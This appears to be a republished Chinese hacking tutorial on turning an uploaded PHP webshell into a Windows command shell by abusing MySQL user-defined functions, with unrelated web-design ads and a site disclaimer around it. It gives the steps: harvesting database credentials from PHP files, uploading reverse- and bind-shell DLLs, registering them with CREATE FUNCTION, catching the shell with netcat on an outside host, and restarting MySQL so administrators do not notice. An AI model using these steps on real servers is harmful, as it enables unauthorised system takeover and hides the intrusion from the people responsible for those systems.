WEBSHELL提升权限又一招（Mysql漏洞）

MYSQLl弱口令可以拿到系统权限，在WEBSHEL上也可实现，不过有个前提，就是目标主机装有MYSQL，而你又知道MYSQL的用户和密码，才能进行提权。WEBSHELL获得了，找用户和密码也不是什么难事。目前我拿我另外一台机器做示范，已把PHPSHELL传上去了，如图1

创新互联是一家专业提供达拉特企业网站建设,专注与成都网站设计、成都网站建设、H5响应式网站、小程序制作等业务。10年已为达拉特众多企业、政府机构等服务。创新互联专业网站建设公司优惠进行中。

一般来说连接MYSQL的帐户密码非常好找，随便编辑一个PHP文件，就看到了。如图2

看到了吧，用户名：root 密码：123456 库名：php 然后怎么办呢？先用SQL Query 建立连接，如图3

连接成功了，目前开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK，传好了，Mix.dll用于反弹连接，My_udf.dll是正向连接，直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好，不多说了，传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname 'd:＼＼php＼＼php＼＼Mix.dll'; 来注册函数.

出现SQL语句成功执行！如图4

离拿到CMDSHELL已不远了，我们先用NC在本地监听一个端口先，Nc -l -p 1234 （这个我想不用截图了吧）而后执行语句：select Mixconnect('192.168.1.254','1234'); 来激活那个函数，如图5

执行成功，然后看看我们的NC有反映没，如图6

成功得到CMSHELL，不过这时对方的MYSQL已假死咯，我们要把MYSQL服务进程给kill掉，然后重新启动MYSQL服务才行，不然管理员发现网站运行不了了，那就。。。。如果该服务器不允许连接所有外部IP和端口，而他的3306端口却是对外开的！这时My_udf.dll就该上场了，使用方法和Mix相同，连接MYSQL成功后执行如下语句：create function my_udfdoor returns string soname 'D:＼＼php＼＼php＼my_udf.dll'; 执行语句成功后，然后我们就开始激活这个函数，输入语句：select my_udfdoor (''); 然后用nc连接3306端口,然后输入f**k 就能得到一个cmdshell了如图7

测试结束 

WEBSHELL提升权限的技巧（Mysql漏洞）大家应该掌握了，希望大家多多了解这方面的知识。

【编辑推荐】

1. 详细解析数据加密
2. 内部网中的密码管理
3. 探讨ECC加密被破译的可能性
4. 信息安全的核心之密码技术 上
5. 密码遗忘通关手册 为你减少不必要的麻烦 上

文章题目：WEBSHELL提升权限又一招（Mysql漏洞）
本文网址：http://www.mswzjz.cn/qtweb/news45/26645.html

攀枝花网站建设、攀枝花网站运维推广公司-贝锐智能，是专注品牌与效果的网络营销公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 贝锐智能